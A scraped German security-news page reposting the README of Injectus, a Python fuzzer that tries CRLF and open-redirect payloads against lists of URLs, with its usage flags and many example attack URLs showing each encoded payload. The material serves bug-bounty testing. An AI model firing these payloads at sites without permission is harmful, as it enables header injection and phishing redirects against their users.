Ausnahme gefangen: SSL certificate problem: certificate is not yet valid ๐Ÿ“Œ Injectus - CRLF And Open Redirect Fuzzer

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š Injectus - CRLF And Open Redirect Fuzzer


๐Ÿ’ก Newskategorie: IT Security Nachrichten
๐Ÿ”— Quelle: feedproxy.google.com


Simple python tool that goes through a list of URLs trying CRLF and open redirect payloads.

โ–ช โ– โ–„ โ–โ–„โ–„โ–„โ–„โ–„โ–„ . โ–„โ–„ยท โ–„โ–„โ–„โ–„โ–„โ–„โ€ข โ–„โ–Œ.โ–„โ–„ ยท
โ–ˆโ–ˆ โ€ขโ–ˆโ–Œโ–โ–ˆ ยทโ–ˆโ–ˆโ–€โ–„.โ–€ยทโ–โ–ˆ โ–Œโ–ชโ€ขโ–ˆโ–ˆ โ–ˆโ–ชโ–ˆโ–ˆโ–Œโ–โ–ˆ โ–€.
โ–โ–ˆยทโ–โ–ˆโ–โ–โ–Œโ–ชโ–„ โ–ˆโ–ˆโ–โ–€โ–€โ–ชโ–„โ–ˆโ–ˆ โ–„โ–„ โ–โ–ˆ.โ–ชโ–ˆโ–Œโ–โ–ˆโ–Œโ–„โ–€โ–€โ–€โ–ˆโ–„
โ–โ–ˆโ–Œโ–ˆโ–ˆโ–โ–ˆโ–Œโ–โ–Œโ–โ–ˆโ–Œโ–โ–ˆโ–„โ–„โ–Œโ–โ–ˆโ–ˆโ–ˆโ–Œ โ–โ–ˆโ–Œยทโ–โ–ˆโ–„โ–ˆโ–Œโ–โ–ˆโ–„โ–ชโ–โ–ˆ
โ–€โ–€โ–€โ–€ โ–ˆโ–ˆโ–ช โ–€โ–€โ–€โ€ข โ–€โ–€โ–€ ยทโ–€โ–€โ–€ โ–€โ–€โ–€ โ–€โ–€โ–€ โ–€โ–€โ–€โ–€
~ BOUNTYSTRIKE ~

usage: Injectus [-h] [-f FILE] [-u URL] [-r] [-w WORKERS] [-t TIMEOUT]
[-d DELAY] [-c] [-op]

CRLF and open redirect fuzzer. Crafted by @dubs3c.

optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE File containing URLs
-u URL, --url URL Single URL to test
-r, --no-request Only build attack list, do not perform any requests
-w WORKERS, --workers WORKERS
Amount of asyncio workers, default is 10
-t TIMEOUT, --timeout TIMEOUT
HTTP request timeout, default is 6 seconds
-d DELAY, --delay DELAY
The delay between requests, default is 1 second
-c, --crlf Only perform crlf attacks
-op, --openredirect Only perform open redirect attacks

Motivation
Needed a simple CRLF/open redirect scanner that I could include into my bug bounty pipeline at https://github.com/BountyStrike/Bountystrike-sh. Didn't find any tools that satisfied my need, so I created Injectus. It's a little bit of an experiment, to see if it works better than other tools.

Design
If we have the following URL:
https://dubell.io/?param1=value1&url=value2&param3=value3
For CRLF attacks, Injectus will inject every payload once into the value of one parameter, for every n parameters. For example, Injectus will create the following list with the URL above:
https://dubell.io/?param1=%%0a0abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%0abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%0d%0abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%0dbounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%23%0dbounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%25%30%61bounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%25%30abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%250abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%25250abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%3f%0dbounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%u000abounty:strike&url=value2&param3=value3

https://dubell.io/?param1=value1&url=%%0a0abounty:strike&param3 =value3
https://dubell.io/?param1=value1&url=%0abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%0d%0abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%0dbounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%23%0dbounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%25%30%61bounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%25%30abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%250abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%25250abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%3f%0dbounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%u000abounty:strike&param3=value3

https://dubell.io/?param1=value1&url=value2&param3=%%0a0abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%0abounty: strike
https://dubell.io/?param1=value1&url=value2&param3=%0d%0abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%0dbounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%23%0dbounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%25%30%61bounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%25%30abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%250abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%25250abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%3f%0dbounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%u000abounty:strike
As you can see, every CRLF payload is injected in the first parameter's value. Once the loop is done, Injectus will inject every payload into the second parameter, and so on. Once all parameters have been injected, the list is complete.
If there are no query parameters, Injectus will simply append each payload to the URL, like so:
https://dubell.io/some/path/%%0a0abounty:strike
https://dubell.io/some/path/%0abounty:strike
https://dubell.io/some/path/%0d%0abounty:strike
https://dubell.io/some/path/%0dbounty:strike
https://dubell.io/some/path/%23%0dbounty:strike
https://dubell.io/some/path/%23%0dbounty:strike
https://dubell.io/some/path/%25%30%61bounty:strike
https://dubell.io/some/path/%25%30abounty:strike
https://dubell.io/some/path/%250abounty:strike
https://dubell.io/some/path/%25250abounty:strike
https://dubell.io/some/path/%3f%0dbounty:strike
https://dubell.io/some/path/%3f%0dbounty:strike
https://dubell.io/some/path/%u000abounty:strike
When injecting open redirect payloads, Injectus will only inject a payload if there exists a query/path parameter containing a typical redirect keyword, e.g. url. Injecting into the following URL https://dubell.io/?param1=value1&url=dashboard&param3=value3:
https://dubell.io/?param1=value1&url=$2f%2fbountystrike.io%2f%2fparam3=value3
https://dubell.io/?param1=value1&url=%2f$2fbountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=%2fbountystrike.io%2f%2fparam3=value3
https://dubell.io/?param1=value1&url=%2fbountystrike.io//param3=value3
https://dubell.io/?param1=value1&url=%2fbountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=////bountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=///bountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=//bountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=/\x08ountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=/bountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=/http://bountystrike.ioparam3=value3
https://dubell.io/?param1=value1&url=bountystrike.ioparam3=value3
The URL contains the query parameter url, so Injectus will inject the payloads into that parameter.
An example when using path parameters. Original URL is https://dubell.io/some/path/that/redirect/dashboard:
https://dubell.io/some/path/that/redirect/$2f%2fbountystrike.io%2f%2f
https://dubell.io/some/path/that/redirect/%2f$2fbountystrike.io
https://dubell.io/some/path/that/redirect/%2fbountystrike.io%2f%2f
https://dubell.io/some/path/that/redirect/%2fbountystrike.io
https://dubell.io/some/path/that/redirect/%2fbountystrike.io//
https://dubell.io/some/path/that/redirect/////bountystrike.io
https://dubell.io/some/path/that/redirect////bountystrike.io
https://dubell.io/some/path/that/redirect///bountystrike.io
https://dubell.io/some/path/that/redirect//\x08ountystrike.io
https://dubell.io/some/path/that/redirect//bountystrike.io
https://dubell.io/some/path/that/redirect//http://bountystrike.io
https://dubell.io/some/path/that/redirect/bountystrike.io
As before, if no query parameters or path parameters are found, Injectus will simply append each payload to the URL:
https://dubell.io/$2f%2fbountystrike.io%2f%2f
https://dubell.io/%2f$2fbountystrike.io
https://dubell.io/%2fbountystrike.io%2f%2f
https://dubell.io/%2fbountystrike.io
https://dubell.io/%2fbountystrike.io//
https://dubell.io/////bountystrike.io
https://dubell.io////bountystrike.io
https://dubell.io///bountystrike.io
https://dubell.io//\\bountystrike.io
https://dubell.io//bountystrike.io
https://dubell.io//http://bountystrike.io
https://dubell.io/bountystrike.io

Installation
pip3.7 install -r requirements.txt --user


...



๐Ÿ“Œ Mutiny Fuzzing Framework - Network Fuzzer That Operates By Replaying PCAPs Through A Mutational Fuzzer


๐Ÿ“ˆ 38.47 Punkte

๐Ÿ“Œ Frida API Fuzzer - This Experimetal Fuzzer Is Meant To Be Used For API In-Memory Fuzzing


๐Ÿ“ˆ 38.47 Punkte

๐Ÿ“Œ OpenRedireX - Asynchronous Open redirect Fuzzer for Humans


๐Ÿ“ˆ 33.59 Punkte

๐Ÿ“Œ Manul - A Coverage-Guided Parallel Fuzzer For Open-Source And Blackbox Binaries On Windows, Linux And MacOS


๐Ÿ“ˆ 27.46 Punkte

๐Ÿ“Œ Lepton CMS 2.2.2 logout.php redirect Open Redirect


๐Ÿ“ˆ 24.04 Punkte

๐Ÿ“Œ Kabona AB WebDatorCentral up to 3.3.x redirect/non-validated Open Redirect


๐Ÿ“ˆ 24.04 Punkte

๐Ÿ“Œ Pivotal Cloud Foundry Runtime UAA Logout Link redirect Open Redirect


๐Ÿ“ˆ 24.04 Punkte

๐Ÿ“Œ Piwigo up to 2.9 identification.php redirect Open Redirect


๐Ÿ“ˆ 24.04 Punkte

๐Ÿ“Œ Furikake 0.1.0 on WordPress classes/Furigana.php furikake-redirect Open Redirect


๐Ÿ“ˆ 24.04 Punkte

๐Ÿ“Œ WolfCMS 0.8.3.1 login[redirect] Open Redirect


๐Ÿ“ˆ 24.04 Punkte

๐Ÿ“Œ Ninja Forms Plugin up to 3.3.19.0 on WordPress step-processing.php redirect Open Redirect


๐Ÿ“ˆ 24.04 Punkte

๐Ÿ“Œ GetSimpleCMS 3.3.13 admin/index.php redirect Open Redirect


๐Ÿ“ˆ 24.04 Punkte

๐Ÿ“Œ QASymphony qTest Manager 9.0.0 qTest Portal /portal/loginform redirect Open Redirect


๐Ÿ“ˆ 24.04 Punkte

๐Ÿ“Œ Moodle up to 3.1.1/3.4.8/3.5.5/3.6.3 Upload redirect Open Redirect


๐Ÿ“ˆ 24.04 Punkte

๐Ÿ“Œ Mikrobi Babel on MODX redirect.php newurl Open Redirect


๐Ÿ“ˆ 24.04 Punkte

๐Ÿ“Œ cPanel up to 70.0.22 redirect.html Open Redirect


๐Ÿ“ˆ 24.04 Punkte

๐Ÿ“Œ cPanel up to 67.9999.102 redirect.html Open Redirect


๐Ÿ“ˆ 24.04 Punkte

๐Ÿ“Œ Google Debuts Continuous Fuzzer for Open Source Software


๐Ÿ“ˆ 23.89 Punkte

๐Ÿ“Œ Google Debuts Continuous Fuzzer for Open Source Software


๐Ÿ“ˆ 23.89 Punkte

๐Ÿ“Œ GitHub - tg12/OpenMailRelayFuzzer: Fuzzer for finding Open Mail Relays


๐Ÿ“ˆ 23.89 Punkte

๐Ÿ“Œ GitHub - tg12/OpenMailRelayFuzzer: Fuzzer for finding Open Mail Relays


๐Ÿ“ˆ 23.89 Punkte

๐Ÿ“Œ Testing: Mit Jazzer erscheint ein Open-Source-Fuzzer fรผr JVM-Anwendungen


๐Ÿ“ˆ 23.89 Punkte

๐Ÿ“Œ 301 Redirects - Easy Redirect Manager <= 2.40 - Authenticated Arbitrary Redirect Injection and Modification, XSS, and CSRF


๐Ÿ“ˆ 22.96 Punkte

๐Ÿ“Œ Scout - Lightweight URL Fuzzer And Spider: Discover A Web Server'S Undisclosed Files, Directories And VHOSTs


๐Ÿ“ˆ 22.81 Punkte

๐Ÿ“Œ Scout โ€“ Lightweight URL Fuzzer And Spider: Discover A Web Serverโ€™S Undisclosed Files, Directories And VHOSTs


๐Ÿ“ˆ 22.81 Punkte

๐Ÿ“Œ Masto-Redirect, a Mastodon Shortcut to Redirect Profiles and Posts to Your Own Instance


๐Ÿ“ˆ 21.17 Punkte

๐Ÿ“Œ FreeRADIUS fragged by fuzzer โ€“ by invitation - and fifteen fails found


๐Ÿ“ˆ 21.02 Punkte

๐Ÿ“Œ Fuzzy Dolphin: Turning Dolphin into a fuzzer for GameCube and Wii games


๐Ÿ“ˆ 21.02 Punkte

๐Ÿ“Œ Urlbuster - Powerful Mutable Web Directory Fuzzer To Bruteforce Existing And/Or Hidden Files Or Directories


๐Ÿ“ˆ 21.02 Punkte

๐Ÿ“Œ Vaf โ€“ Fast and Advance Fuzzer


๐Ÿ“ˆ 21.02 Punkte

๐Ÿ“Œ SSRFMap - Automatic SSRF Fuzzer And Exploitation Tool


๐Ÿ“ˆ 21.02 Punkte

๐Ÿ“Œ CATS - REST API Fuzzer And Negative Testing Tool For OpenAPI Endpoints


๐Ÿ“ˆ 21.02 Punkte

๐Ÿ“Œ SSRFmap - Automatic SSRF Fuzzer And Exploitation Tool


๐Ÿ“ˆ 21.02 Punkte

๐Ÿ“Œ Chrome Fuzzer Program Update And How-To


๐Ÿ“ˆ 21.02 Punkte

๐Ÿ“Œ Packer-Fuzzer - A Fast And Efficient Scanner For Security Detection Of Websites Constructed By Javascript Module Bundler Such As Webpack


๐Ÿ“ˆ 21.02 Punkte











matomo